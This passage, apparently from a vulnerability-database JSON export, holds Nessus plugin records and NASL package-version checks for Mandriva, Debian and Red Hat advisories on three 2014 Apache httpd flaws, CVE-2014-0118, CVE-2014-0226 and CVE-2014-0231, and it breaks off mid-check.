reference:\"mod24_ldap-2.4.10-1.59.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"mod24_proxy_html-2.4.10-1.59.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"mod24_session-2.4.10-1.59.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"mod24_ssl-2.4.10-1.59.amzn1\")) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:rpm_report_get());\n else security_warning(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"httpd24 / httpd24-debuginfo / httpd24-devel / httpd24-manual / etc\");\n}\n", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-01-07T11:54:40", "description": "Updated apache package fixes security vulnerabilities :\n\nA race condition flaw, leading to heap-based buffer overflows, was\nfound in the mod_status httpd module. 
A remote attacker able to access\na status page served by mod_status on a server using a threaded\nMulti-Processing Module (MPM) could send a specially crafted request\nthat would cause the httpd child process to crash or, possibly, allow\nthe attacker to execute arbitrary code with the privileges of the\napache user (CVE-2014-0226).\n\nA denial of service flaw was found in the way httpd's mod_deflate\nmodule handled request body decompression (configured via the DEFLATE\ninput filter). A remote attacker able to send a request whose body\nwould be decompressed could use this flaw to consume an excessive\namount of system memory and CPU on the target system (CVE-2014-0118).\n\nA denial of service flaw was found in the way httpd's mod_cgid module\nexecuted CGI scripts that did not read data from the standard input. A\nremote attacker could submit a specially crafted request that would\ncause the httpd child process to hang indefinitely (CVE-2014-0231).", "edition": 26, "published": "2014-07-31T00:00:00", "title": "Mandriva Linux Security Advisory : apache (MDVSA-2014:142)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2014-0231", "CVE-2014-0118", "CVE-2014-0226"], "modified": "2014-07-31T00:00:00", "cpe": ["cpe:/o:mandriva:business_server:1", "p-cpe:/a:mandriva:linux:apache-mod_suexec", "p-cpe:/a:mandriva:linux:apache-mpm-worker", "p-cpe:/a:mandriva:linux:apache-mod_ssl", "p-cpe:/a:mandriva:linux:apache-mod_ldap", "p-cpe:/a:mandriva:linux:apache-mpm-event", "p-cpe:/a:mandriva:linux:apache-htcacheclean", "p-cpe:/a:mandriva:linux:apache-devel", "p-cpe:/a:mandriva:linux:apache-mod_proxy_scgi", "p-cpe:/a:mandriva:linux:apache-mod_dav", "p-cpe:/a:mandriva:linux:apache-doc", "p-cpe:/a:mandriva:linux:apache-mod_dbd", "p-cpe:/a:mandriva:linux:apache-mod_mem_cache", "p-cpe:/a:mandriva:linux:apache-mod_proxy", "p-cpe:/a:mandriva:linux:apache-mpm-peruser", "p-cpe:/a:mandriva:linux:apache-mod_file_cache", "p-cpe:/a:mandriva:linux:apache-mod_authn_dbd", 
"p-cpe:/a:mandriva:linux:apache-source", "p-cpe:/a:mandriva:linux:apache-mod_deflate", "p-cpe:/a:mandriva:linux:apache-mod_proxy_ajp", "p-cpe:/a:mandriva:linux:apache-mod_disk_cache", "p-cpe:/a:mandriva:linux:apache-mod_reqtimeout", "p-cpe:/a:mandriva:linux:apache-mpm-itk", "p-cpe:/a:mandriva:linux:apache", "p-cpe:/a:mandriva:linux:apache-mpm-prefork", "p-cpe:/a:mandriva:linux:apache-mod_cache", "p-cpe:/a:mandriva:linux:apache-mod_userdir"], "id": "MANDRIVA_MDVSA-2014-142.NASL", "href": "https://www.tenable.com/plugins/nessus/76923", "sourceData": "#%NASL_MIN_LEVEL 70300\n\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Mandriva Linux Security Advisory MDVSA-2014:142. \n# The text itself is copyright (C) Mandriva S.A.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(76923);\n script_version(\"1.12\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/06\");\n\n script_cve_id(\"CVE-2014-0118\", \"CVE-2014-0226\", \"CVE-2014-0231\");\n script_bugtraq_id(68678, 68742, 68745);\n script_xref(name:\"MDVSA\", value:\"2014:142\");\n\n script_name(english:\"Mandriva Linux Security Advisory : apache (MDVSA-2014:142)\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\n\"The remote Mandriva Linux host is missing one or more security\nupdates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Updated apache package fixes security vulnerabilities :\n\nA race condition flaw, leading to heap-based buffer overflows, was\nfound in the mod_status httpd module. 
A remote attacker able to access\na status page served by mod_status on a server using a threaded\nMulti-Processing Module (MPM) could send a specially crafted request\nthat would cause the httpd child process to crash or, possibly, allow\nthe attacker to execute arbitrary code with the privileges of the\napache user (CVE-2014-0226).\n\nA denial of service flaw was found in the way httpd's mod_deflate\nmodule handled request body decompression (configured via the DEFLATE\ninput filter). A remote attacker able to send a request whose body\nwould be decompressed could use this flaw to consume an excessive\namount of system memory and CPU on the target system (CVE-2014-0118).\n\nA denial of service flaw was found in the way httpd's mod_cgid module\nexecuted CGI scripts that did not read data from the standard input. A\nremote attacker could submit a specially crafted request that would\ncause the httpd child process to hang indefinitely (CVE-2014-0231).\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://advisories.mageia.org/MGASA-2014-0304.html\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:apache\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:apache-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:apache-doc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:apache-htcacheclean\");\n script_set_attribute(attribute:\"cpe\", 
value:\"p-cpe:/a:mandriva:linux:apache-mod_authn_dbd\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:apache-mod_cache\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:apache-mod_dav\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:apache-mod_dbd\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:apache-mod_deflate\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:apache-mod_disk_cache\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:apache-mod_file_cache\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:apache-mod_ldap\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:apache-mod_mem_cache\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:apache-mod_proxy\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:apache-mod_proxy_ajp\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:apache-mod_proxy_scgi\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:apache-mod_reqtimeout\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:apache-mod_ssl\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:apache-mod_suexec\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:apache-mod_userdir\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:apache-mpm-event\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:apache-mpm-itk\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:apache-mpm-peruser\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:apache-mpm-prefork\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:apache-mpm-worker\");\n 
script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:apache-source\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:mandriva:business_server:1\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2014/07/30\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2014/07/31\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2014-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Mandriva Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/Mandrake/release\", \"Host/Mandrake/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Mandrake/release\")) audit(AUDIT_OS_NOT, \"Mandriva / Mandake Linux\");\nif (!get_kb_item(\"Host/Mandrake/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (cpu !~ \"^(amd64|i[3-6]86|x86_64)$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Mandriva / Mandrake Linux\", cpu);\n\n\nflag = 0;\nif (rpm_check(release:\"MDK-MBS1\", cpu:\"x86_64\", reference:\"apache-2.2.27-1.1.mbs1\")) flag++;\nif (rpm_check(release:\"MDK-MBS1\", cpu:\"x86_64\", reference:\"apache-devel-2.2.27-1.1.mbs1\")) flag++;\nif (rpm_check(release:\"MDK-MBS1\", reference:\"apache-doc-2.2.27-1.1.mbs1\")) flag++;\nif (rpm_check(release:\"MDK-MBS1\", cpu:\"x86_64\", reference:\"apache-htcacheclean-2.2.27-1.1.mbs1\")) flag++;\nif (rpm_check(release:\"MDK-MBS1\", cpu:\"x86_64\", reference:\"apache-mod_authn_dbd-2.2.27-1.1.mbs1\")) flag++;\nif (rpm_check(release:\"MDK-MBS1\", cpu:\"x86_64\", reference:\"apache-mod_cache-2.2.27-1.1.mbs1\")) 
flag++;\nif (rpm_check(release:\"MDK-MBS1\", cpu:\"x86_64\", reference:\"apache-mod_dav-2.2.27-1.1.mbs1\")) flag++;\nif (rpm_check(release:\"MDK-MBS1\", cpu:\"x86_64\", reference:\"apache-mod_dbd-2.2.27-1.1.mbs1\")) flag++;\nif (rpm_check(release:\"MDK-MBS1\", cpu:\"x86_64\", reference:\"apache-mod_deflate-2.2.27-1.1.mbs1\")) flag++;\nif (rpm_check(release:\"MDK-MBS1\", cpu:\"x86_64\", reference:\"apache-mod_disk_cache-2.2.27-1.1.mbs1\")) flag++;\nif (rpm_check(release:\"MDK-MBS1\", cpu:\"x86_64\", reference:\"apache-mod_file_cache-2.2.27-1.1.mbs1\")) flag++;\nif (rpm_check(release:\"MDK-MBS1\", cpu:\"x86_64\", reference:\"apache-mod_ldap-2.2.27-1.1.mbs1\")) flag++;\nif (rpm_check(release:\"MDK-MBS1\", cpu:\"x86_64\", reference:\"apache-mod_mem_cache-2.2.27-1.1.mbs1\")) flag++;\nif (rpm_check(release:\"MDK-MBS1\", cpu:\"x86_64\", reference:\"apache-mod_proxy-2.2.27-1.1.mbs1\")) flag++;\nif (rpm_check(release:\"MDK-MBS1\", cpu:\"x86_64\", reference:\"apache-mod_proxy_ajp-2.2.27-1.1.mbs1\")) flag++;\nif (rpm_check(release:\"MDK-MBS1\", cpu:\"x86_64\", reference:\"apache-mod_proxy_scgi-2.2.27-1.1.mbs1\")) flag++;\nif (rpm_check(release:\"MDK-MBS1\", cpu:\"x86_64\", reference:\"apache-mod_reqtimeout-2.2.27-1.1.mbs1\")) flag++;\nif (rpm_check(release:\"MDK-MBS1\", cpu:\"x86_64\", reference:\"apache-mod_ssl-2.2.27-1.1.mbs1\")) flag++;\nif (rpm_check(release:\"MDK-MBS1\", cpu:\"x86_64\", reference:\"apache-mod_suexec-2.2.27-1.1.mbs1\")) flag++;\nif (rpm_check(release:\"MDK-MBS1\", cpu:\"x86_64\", reference:\"apache-mod_userdir-2.2.27-1.1.mbs1\")) flag++;\nif (rpm_check(release:\"MDK-MBS1\", cpu:\"x86_64\", reference:\"apache-mpm-event-2.2.27-1.1.mbs1\")) flag++;\nif (rpm_check(release:\"MDK-MBS1\", cpu:\"x86_64\", reference:\"apache-mpm-itk-2.2.27-1.1.mbs1\")) flag++;\nif (rpm_check(release:\"MDK-MBS1\", cpu:\"x86_64\", reference:\"apache-mpm-peruser-2.2.27-1.1.mbs1\")) flag++;\nif (rpm_check(release:\"MDK-MBS1\", cpu:\"x86_64\", 
reference:\"apache-mpm-prefork-2.2.27-1.1.mbs1\")) flag++;\nif (rpm_check(release:\"MDK-MBS1\", cpu:\"x86_64\", reference:\"apache-mpm-worker-2.2.27-1.1.mbs1\")) flag++;\nif (rpm_check(release:\"MDK-MBS1\", reference:\"apache-source-2.2.27-1.1.mbs1\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:rpm_report_get());\n else security_warning(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-01-12T09:48:41", "description": "Several security issues were found in the Apache HTTP server.\n\n - CVE-2014-0118\n The DEFLATE input filter (inflates request bodies) in\n mod_deflate allows remote attackers to cause a denial of\n service (resource consumption) via crafted request data\n that decompresses to a much larger size.\n\n - CVE-2014-0226\n A race condition was found in mod_status. An attacker\n able to access a public server status page on a server\n could send carefully crafted requests which could lead\n to a heap buffer overflow, causing denial of service,\n disclosure of sensitive information, or potentially the\n execution of arbitrary code.\n\n - CVE-2014-0231\n A flaw was found in mod_cgid. 
If a server using mod_cgid\n hosted CGI scripts which did not consume standard input,\n a remote attacker could cause child processes to hang\n indefinitely, leading to denial of service.", "edition": 15, "published": "2014-07-26T00:00:00", "title": "Debian DSA-2989-1 : apache2 - security update", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2014-0231", "CVE-2014-0118", "CVE-2014-0226"], "modified": "2014-07-26T00:00:00", "cpe": ["cpe:/o:debian:debian_linux:7.0", "p-cpe:/a:debian:debian_linux:apache2"], "id": "DEBIAN_DSA-2989.NASL", "href": "https://www.tenable.com/plugins/nessus/76844", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Debian Security Advisory DSA-2989. The text \n# itself is copyright (C) Software in the Public Interest, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(76844);\n script_version(\"1.16\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/11\");\n\n script_cve_id(\"CVE-2014-0118\", \"CVE-2014-0226\", \"CVE-2014-0231\");\n script_bugtraq_id(68678, 68742, 68745);\n script_xref(name:\"DSA\", value:\"2989\");\n\n script_name(english:\"Debian DSA-2989-1 : apache2 - security update\");\n script_summary(english:\"Checks dpkg output for the updated package\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Debian host is missing a security-related update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Several security issues were found in the Apache HTTP server.\n\n - CVE-2014-0118\n The DEFLATE input filter (inflates request bodies) in\n mod_deflate allows remote attackers to cause a denial of\n service (resource consumption) via crafted request data\n that decompresses to a much larger size.\n\n - CVE-2014-0226\n A race condition was found in mod_status. 
An attacker\n able to access a public server status page on a server\n could send carefully crafted requests which could lead\n to a heap buffer overflow, causing denial of service,\n disclosure of sensitive information, or potentially the\n execution of arbitrary code.\n\n - CVE-2014-0231\n A flaw was found in mod_cgid. If a server using mod_cgid\n hosted CGI scripts which did not consume standard input,\n a remote attacker could cause child processes to hang\n indefinitely, leading to denial of service.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2014-0118\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2014-0226\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2014-0231\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://packages.debian.org/source/wheezy/apache2\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.debian.org/security/2014/dsa-2989\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\n\"Upgrade the apache2 packages.\n\nFor the stable distribution (wheezy), these problems have been fixed\nin version 2.2.22-13+deb7u3.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:apache2\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:debian:debian_linux:7.0\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2014/07/24\");\n 
script_set_attribute(attribute:\"plugin_publication_date\", value:\"2014/07/26\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2014-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Debian Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/Debian/release\", \"Host/Debian/dpkg-l\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"debian_package.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Debian/release\")) audit(AUDIT_OS_NOT, \"Debian\");\nif (!get_kb_item(\"Host/Debian/dpkg-l\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\nif (deb_check(release:\"7.0\", prefix:\"apache2\", reference:\"2.2.22-13+deb7u3\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"apache2-dbg\", reference:\"2.2.22-13+deb7u3\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"apache2-doc\", reference:\"2.2.22-13+deb7u3\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"apache2-mpm-event\", reference:\"2.2.22-13+deb7u3\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"apache2-mpm-itk\", reference:\"2.2.22-13+deb7u3\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"apache2-mpm-prefork\", reference:\"2.2.22-13+deb7u3\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"apache2-mpm-worker\", reference:\"2.2.22-13+deb7u3\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"apache2-prefork-dev\", reference:\"2.2.22-13+deb7u3\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"apache2-suexec\", reference:\"2.2.22-13+deb7u3\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"apache2-suexec-custom\", reference:\"2.2.22-13+deb7u3\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"apache2-threaded-dev\", reference:\"2.2.22-13+deb7u3\")) flag++;\nif (deb_check(release:\"7.0\", 
prefix:\"apache2-utils\", reference:\"2.2.22-13+deb7u3\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"apache2.2-bin\", reference:\"2.2.22-13+deb7u3\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"apache2.2-common\", reference:\"2.2.22-13+deb7u3\")) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:deb_report_get());\n else security_warning(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-09-25T09:15:21", "description": "Updated httpd packages that fix three security issues are now\navailable for Red Hat Enterprise Linux 5 and 6.\n\nThe Red Hat Security Response Team has rated this update as having\nImportant security impact. Common Vulnerability Scoring System (CVSS)\nbase scores, which give detailed severity ratings, are available for\neach vulnerability from the CVE links in the References section.\n\nThe httpd packages provide the Apache HTTP Server, a powerful,\nefficient, and extensible web server.\n\nA race condition flaw, leading to heap-based buffer overflows, was\nfound in the mod_status httpd module. A remote attacker able to access\na status page served by mod_status on a server using a threaded\nMulti-Processing Module (MPM) could send a specially crafted request\nthat would cause the httpd child process to crash or, possibly, allow\nthe attacker to execute arbitrary code with the privileges of the\n'apache' user. (CVE-2014-0226)\n\nA denial of service flaw was found in the way httpd's mod_deflate\nmodule handled request body decompression (configured via the\n'DEFLATE' input filter). A remote attacker able to send a request\nwhose body would be decompressed could use this flaw to consume an\nexcessive amount of system memory and CPU on the target system.\n(CVE-2014-0118)\n\nA denial of service flaw was found in the way httpd's mod_cgid module\nexecuted CGI scripts that did not read data from the standard input. 
A\nremote attacker could submit a specially crafted request that would\ncause the httpd child process to hang indefinitely. (CVE-2014-0231)\n\nAll httpd users are advised to upgrade to these updated packages,\nwhich contain backported patches to correct these issues. After\ninstalling the updated packages, the httpd daemon will be restarted\nautomatically.", "edition": 24, "published": "2014-07-24T00:00:00", "title": "RHEL 5 / 6 : httpd (RHSA-2014:0920)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2014-0231", "CVE-2014-0118", "CVE-2014-0226"], "modified": "2014-07-24T00:00:00", "cpe": ["p-cpe:/a:redhat:enterprise_linux:mod_ssl", "cpe:/o:redhat:enterprise_linux:5", "cpe:/o:redhat:enterprise_linux:6.5", "p-cpe:/a:redhat:enterprise_linux:httpd-debuginfo", "p-cpe:/a:redhat:enterprise_linux:httpd", "p-cpe:/a:redhat:enterprise_linux:httpd-tools", "cpe:/o:redhat:enterprise_linux:6", "p-cpe:/a:redhat:enterprise_linux:httpd-manual", "p-cpe:/a:redhat:enterprise_linux:httpd-devel"], "id": "REDHAT-RHSA-2014-0920.NASL", "href": "https://www.tenable.com/plugins/nessus/76749", "sourceData": "#%NASL_MIN_LEVEL 80502\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Red Hat Security Advisory RHSA-2014:0920. 
The text \n# itself is copyright (C) Red Hat, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(76749);\n script_version(\"1.19\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2020/09/24\");\n\n script_cve_id(\"CVE-2014-0118\", \"CVE-2014-0226\", \"CVE-2014-0231\");\n script_xref(name:\"RHSA\", value:\"2014:0920\");\n\n script_name(english:\"RHEL 5 / 6 : httpd (RHSA-2014:0920)\");\n script_summary(english:\"Checks the rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Red Hat host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Updated httpd packages that fix three security issues are now\navailable for Red Hat Enterprise Linux 5 and 6.\n\nThe Red Hat Security Response Team has rated this update as having\nImportant security impact. Common Vulnerability Scoring System (CVSS)\nbase scores, which give detailed severity ratings, are available for\neach vulnerability from the CVE links in the References section.\n\nThe httpd packages provide the Apache HTTP Server, a powerful,\nefficient, and extensible web server.\n\nA race condition flaw, leading to heap-based buffer overflows, was\nfound in the mod_status httpd module. A remote attacker able to access\na status page served by mod_status on a server using a threaded\nMulti-Processing Module (MPM) could send a specially crafted request\nthat would cause the httpd child process to crash or, possibly, allow\nthe attacker to execute arbitrary code with the privileges of the\n'apache' user. (CVE-2014-0226)\n\nA denial of service flaw was found in the way httpd's mod_deflate\nmodule handled request body decompression (configured via the\n'DEFLATE' input filter). 
A remote attacker able to send a request\nwhose body would be decompressed could use this flaw to consume an\nexcessive amount of system memory and CPU on the target system.\n(CVE-2014-0118)\n\nA denial of service flaw was found in the way httpd's mod_cgid module\nexecuted CGI scripts that did not read data from the standard input. A\nremote attacker could submit a specially crafted request that would\ncause the httpd child process to hang indefinitely. (CVE-2014-0231)\n\nAll httpd users are advised to upgrade to these updated packages,\nwhich contain backported patches to correct these issues. After\ninstalling the updated packages, the httpd daemon will be restarted\nautomatically.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/errata/RHSA-2014:0920\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2014-0231\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2014-0118\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2014-0226\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:httpd\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:httpd-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:httpd-devel\");\n script_set_attribute(attribute:\"cpe\", 
value:\"p-cpe:/a:redhat:enterprise_linux:httpd-manual\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:httpd-tools\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:mod_ssl\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:5\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:6\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:6.5\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2014/07/20\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2014/07/23\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2014/07/24\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2014-2020 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Red Hat Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Red Hat\" >!< release) audit(AUDIT_OS_NOT, \"Red Hat\");\nos_ver = pregmatch(pattern: \"Red Hat Enterprise Linux.*release ([0-9]+(\\.[0-9]+)?)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Red Hat\");\nos_ver = os_ver[1];\nif (! 
preg(pattern:\"^(5|6)([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Red Hat 5.x / 6.x\", \"Red Hat \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\" && \"s390\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Red Hat\", cpu);\n\nyum_updateinfo = get_kb_item(\"Host/RedHat/yum-updateinfo\");\nif (!empty_or_null(yum_updateinfo)) \n{\n rhsa = \"RHSA-2014:0920\";\n yum_report = redhat_generate_yum_updateinfo_report(rhsa:rhsa);\n if (!empty_or_null(yum_report))\n {\n security_report_v4(\n port : 0,\n severity : SECURITY_WARNING,\n extra : yum_report \n );\n exit(0);\n }\n else\n {\n audit_message = \"affected by Red Hat security advisory \" + rhsa;\n audit(AUDIT_OS_NOT, audit_message);\n }\n}\nelse\n{\n flag = 0;\n if (rpm_check(release:\"RHEL5\", cpu:\"i386\", 